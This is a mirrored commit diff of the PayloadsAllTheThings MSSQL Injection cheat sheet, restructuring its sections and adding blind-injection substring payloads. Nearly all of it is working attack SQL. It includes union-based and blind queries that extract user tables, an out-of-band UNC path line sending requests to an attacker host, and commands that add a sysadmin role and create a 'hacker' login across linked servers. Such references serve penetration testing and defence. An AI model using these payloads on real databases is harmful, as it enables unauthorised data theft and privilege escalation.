gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-29 22:20:26 -08:00
Code Issues Packages Projects Releases Wiki Activity

MSSQL, OracleSQL, PostgreSQL Substring Equivalent

Browse Source
This commit is contained in:
Swissky
2024-11-16 15:35:43 +01:00
parent 67af38aa4e
commit 9a908a15d2
4 changed files with 187 additions and 169 deletions
Download Patch File Download Diff File Expand all files Collapse all files

225
SQL Injection/MSSQL Injection.md
View File

@@ -7,17 +7,15 @@
* [MSSQL Default Databases](#mssql-default-databases)
* [MSSQL Comments](#mssql-comments)
* [MSSQL User](#mssql-user)
* [MSSQL Version](#mssql-version)
* [MSSQL Hostname](#mssql-hostname)
* [MSSQL Database Name](#mssql-database-name)
* [MSSQL Database Credentials](#mssql-database-credentials)
* [MSSQL List Databases](#mssql-list-databases)
* [MSSQL List Columns](#mssql-list-columns)
* [MSSQL List Tables](#mssql-list-tables)
* [MSSQL Enumeration](#mssql-enumeration)
* [MSSQL List Databases](#mssql-list-databases)
* [MSSQL List Columns](#mssql-list-columns)
* [MSSQL List Tables](#mssql-list-tables)
* [MSSQL Union Based](#mssql-union-based)
* [MSSQL Error Based](#mssql-error-based)
* [MSSQL Blind Based](#mssql-blind-based)
* [MSSQL Blind With Substring Equivalent](#mssql-blind-with-substring-equivalent)
* [MSSQL Time Based](#mssql-time-based)
* [MSSQL Stacked Query](#mssql-stacked-query)
* [MSSQL Read File](#mssql-read-file)
@@ -27,9 +25,10 @@
* [MSSQL Out of Band](#mssql-out-of-band)
* [MSSQL DNS Exfiltration](#mssql-dns-exfiltration)
* [MSSQL UNC Path](#mssql-unc-path)
* [MSSQL Make User DBA](#mssql-make-user-dba)
* [MSSQL Trusted Links](#mssql-trusted-links)
* [MSSQL List Permissions](#mssql-list-permissions)
* [MSSQL Privileges](#mssql-privileges)
* [MSSQL List Permissions](#mssql-list-permissions)
* [MSSQL Make User DBA](#mssql-make-user-dba)
* [References](#references)
@@ -54,39 +53,6 @@
| `;%00` | Null byte |
## MSSQL User
```sql
SELECT CURRENT_USER
SELECT user_name();
SELECT system_user;
SELECT user;
```
## MSSQL Version
```sql
SELECT @@version
```
## MSSQL Hostname
```sql
SELECT HOST_NAME()
SELECT @@hostname
SELECT @@SERVERNAME
SELECT SERVERPROPERTY('productversion')
SELECT SERVERPROPERTY('productlevel')
SELECT SERVERPROPERTY('edition');
```
## MSSQL Database Name
```sql
SELECT DB_NAME()
```
## MSSQL Database Credentials
* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578`
@@ -102,58 +68,100 @@ SELECT DB_NAME()
```
## MSSQL List Databases
## MSSQL Enumeration
| Description | SQL Query |
| ------------- | ----------------------------------------- |
| DBMS version | `SELECT @@version` |
| Database name | `SELECT DB_NAME()` |
| Hostname | `SELECT HOST_NAME()` |
| Hostname | `SELECT @@hostname` |
| Hostname | `SELECT @@SERVERNAME` |
| Hostname | `SELECT SERVERPROPERTY('productversion')` |
| Hostname | `SELECT SERVERPROPERTY('productlevel')` |
| Hostname | `SELECT SERVERPROPERTY('edition')` |
| User | `SELECT CURRENT_USER` |
| User | `SELECT user_name();` |
| User | `SELECT system_user;` |
| User | `SELECT user;` |
### MSSQL List Databases
```sql
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); — for N = 0, 1, 2, …
SELECT STRING_AGG(name, ', ') FROM master..sysdatabases; -- Change delimiter value such as ', ' to anything else you want => master, tempdb, model, msdb (Only works in MSSQL 2017+)
-- for N = 0, 1, 2, …
SELECT DB_NAME(N);
-- Change delimiter value such as ', ' to anything else you want => master, tempdb, model, msdb
-- (Only works in MSSQL 2017+)
SELECT STRING_AGG(name, ', ') FROM master..sysdatabases;
```
## MSSQL List Columns
### MSSQL List Columns
```sql
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable
-- for the current DB only
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable');
-- list column names and types for master..sometable
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
SELECT table_catalog, column_name FROM information_schema.columns
```
## MSSQL List Tables
### MSSQL List Tables
```sql
SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
-- use xtype = 'V' for views
SELECT name FROM master..sysobjects WHERE xtype = 'U';
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable
-- list column names and types for master..sometable
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
SELECT table_catalog, table_name FROM information_schema.columns
SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; -- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+)
-- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+)
SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U';
```
## MSSQL Union Based
```sql
-- extract databases names
$ SELECT name FROM master..sysdatabases
[*] Injection
[*] msdb
[*] tempdb
* Extract databases names
-- extract tables from Injection database
$ SELECT name FROM Injection..sysobjects WHERE xtype = 'U'
[*] Profiles
[*] Roles
[*] Users
```sql
$ SELECT name FROM master..sysdatabases
[*] Injection
[*] msdb
[*] tempdb
```
-- extract columns for the table Users
$ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')
[*] UserId
[*] UserName
* Extract tables from Injection database
-- Finally extract the data
$ SELECT UserId, UserName from Users
```
```sql
$ SELECT name FROM Injection..sysobjects WHERE xtype = 'U'
[*] Profiles
[*] Roles
[*] Users
```
* Extract columns for the table Users
```sql
$ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')
[*] UserId
[*] UserName
```
* Finally extract the data
```sql
$ SELECT UserId, UserName from Users
```
## MSSQL Error Based
@@ -179,14 +187,26 @@ $ SELECT UserId, UserName from Users
AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -
```
```sql
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
SELECT message FROM data WHERE row = 1 and message like 't%'
```
### MSSQL Blind With Substring Equivalent
| Function | Example |
| ----------- | ----------------------------------------------- |
| `SUBSTRING` | `SUBSTRING('foobar', <START>, <LENGTH>)` |
Examples:
```sql
AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97
AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64--
AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
SELECT message FROM data WHERE row = 1 and message like 't%'
```
@@ -312,12 +332,6 @@ RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'
```
## MSSQL Make User DBA
```sql
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
```
## MSSQL Trusted Links
> The links between databases work even across forest trusts.
@@ -349,32 +363,43 @@ EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '')
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
```
## List Permissions
Listing effective permissions of current user on the server.
## MSSQL Privileges
### MSSQL List Permissions
* Listing effective permissions of current user on the server.
```sql
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
```
* Listing effective permissions of current user on the database.
```sql
SELECT * FROM fn_my_permissions (NULL, 'DATABASE');
```
* Listing effective permissions of current user on a view.
```sql
SELECT * FROM fn_my_permissions('Sales.vIndividualCustomer', 'OBJECT') ORDER BY subentity_name, permission_name;
```
* Check if current user is a member of the specified server role.
```sql
-- possible roles: sysadmin, serveradmin, dbcreator, setupadmin, bulkadmin, securityadmin, diskadmin, public, processadmin
SELECT is_srvrolemember('sysadmin');
```
### MSSQL Make User DBA
```sql
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
```
Listing effective permissions of current user on the database.
```sql
SELECT * FROM fn_my_permissions (NULL, 'DATABASE');
```
Listing effective permissions of current user on a view.
```
SELECT * FROM fn_my_permissions('Sales.vIndividualCustomer', 'OBJECT') ORDER BY subentity_name, permission_name;
```
Check if current user is a member of the specified server role.
```sql
-- possible roles: sysadmin, serveradmin, dbcreator, setupadmin, bulkadmin, securityadmin, diskadmin, public, processadmin
SELECT is_srvrolemember('sysadmin');
```
## MSSQL OPSEC